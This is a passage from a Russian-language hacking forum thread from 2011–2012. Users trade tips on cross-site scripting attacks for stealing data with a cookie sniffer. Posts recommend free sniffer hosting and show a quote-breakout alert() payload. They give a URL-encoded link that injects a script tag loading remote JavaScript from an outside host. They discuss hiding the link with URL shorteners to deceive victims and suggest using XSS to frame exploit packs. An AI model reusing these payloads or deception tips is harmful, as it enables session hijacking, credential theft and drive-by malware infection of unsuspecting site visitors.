 |
|
12.04.2011, 01:00
|
|
Новичок
Регистрация: 11.04.2011
Сообщений: 21
С нами:
7941206
Репутация:
0
|
|
а бесплатный хостинг для снифера посоветуете актуальный?
|
|
|
12.04.2011, 01:00
|
|
Участник форума
Регистрация: 11.03.2011
Сообщений: 182
С нами:
7985846
Репутация:
5
|
|
Цитата:
Сообщение от lagranj
а бесплатный хостинг для снифера посоветуете актуальный?
holm.ru
Добавлено через 1 минуту
Цитата:
Сообщение от M@ZAX@KEP
Так я ничего не скажу. Это надо видеть твою формочку поиска и её исходный код. И потыкать разными способами, поэкспериментировать. Например, каким образом фильтрует двойную кавычку? Отбрасывает или заменяет другим символом?
HTML highlight
Код:
alert()" name="search"/>
Добавлено через 17 минут
Цитата:
Способ 3: кодируем в url ядовитую часть ссылки. Кодировать можно тут. Получим ссылку такого вида:
Цитата:
httр://site.com/index.php?page=%3CSCRIPT%20type%3Dtext%2Fjavascrip t%20src%3Dhttp% 3A%2F%2Fhttpz.ru%2Fg4cuwl48edgo.js%3E%3C%2FSCRIPT% 3E%22
Кодировать лучше тут
Было :
PHP highlight
Код:
Код:
http://site.com/index.php?page="
Стало:
code:
http://site.com/index.php?page=%3C%53%43%52%49%50%54%20%74%79%70%6 5%3D%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74% 20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%74%74%70%7A %2E%72%75%2F%67%34%63%75%77%6C%34%38%65%64%67%6F%2 E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E%22 |
|
|
|
12.04.2011, 01:00
|
|
Новичок
Регистрация: 01.08.2010
Сообщений: 8
С нами:
8305526
Репутация:
0
|
|
Цитата:
Сообщение от M@ZAX@KEP
Способ 1: топаем на tinyurl.com и вбиваем туда нашу ссылку. Получаем в результате другую... короткую и загадочную :wink: А результат её работы - тот же :banana:
xD лучше уже вместо tinyurl.com, сокращать ссылки на лохе
Больше ведь народу поверят, и ссылка начинается с loh.ru и будет интересно вообще, кто там, что про тя написал =) |
|
|
|
12.04.2011, 01:00
|
|
Участник форума
Регистрация: 11.03.2011
Сообщений: 182
С нами:
7985846
Репутация:
5
|
|
Цитата:
Сообщение от narviss
xD лучше уже вместо tinyurl.com, сокращать ссылки на лохе
Больше ведь народу поверят, и ссылка начинается с loh.ru и будет интересно вообще, кто там, что про тя написал =)
ну это на реальных лохов.
Но если человек смотрит на ссылку то все же мой вариант лучше. |
|
|
|
13.04.2011, 01:00
|
|
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами:
8903558
Репутация:
60
|
|
Наверное, облом. Из двойных кавычек ты тут не вылезешь, если они фильтруются.
|
|
|
|
11.10.2011, 01:00
|
|
Постоянный
Регистрация: 27.06.2009
Сообщений: 326
С нами:
8881526
Репутация:
4
|
|
Что-то на сниффер вообще никакие записи не приходят.
Редирект выполняется.
При cмене хоста на "holm", на секунду при обновлении лога вылазит: STAT.SU
Кто что может посоветовать?
|
|
|
|
03.02.2012, 01:00
|
|
Новичок
Регистрация: 03.02.2012
Сообщений: 1
С нами:
7512086
Репутация:
0
|
|
спасибо, информация будет полезна в будущем, автору респект
|
|
|
|
07.02.2012, 01:00
|
|
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами:
8903558
Репутация:
60
|
|
Genua, читайте про связки сплойтов \ сплойт-паки.
XSS можно использовать чтобы вставить фрейм на связку сплойтов.
|
|
|
|
07.02.2012, 01:00
|
|
Новичок
Регистрация: 04.01.2012
Сообщений: 8
С нами:
7555286
Репутация:
-1
|
|
Всем привет) в статье говорилось, что с помощью XSS можно залить эксплойт, это можно с активной сделать?? Где я могу про это почитать(статья)?
|
|
|
|
08.02.2012, 01:00
|
|
Новичок
Регистрация: 04.01.2012
Сообщений: 8
С нами:
7555286
Репутация:
-1
|
|
M@ZAX@KEP, спс за инфу))
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [H]acke[R]](/avatars/avatar4530092.jpg?34874102){kind=avatar}
![Аватар для [H]acke[R]](/avatars/avatar4530092.jpg?34874110){kind=avatar}
Линейный вид
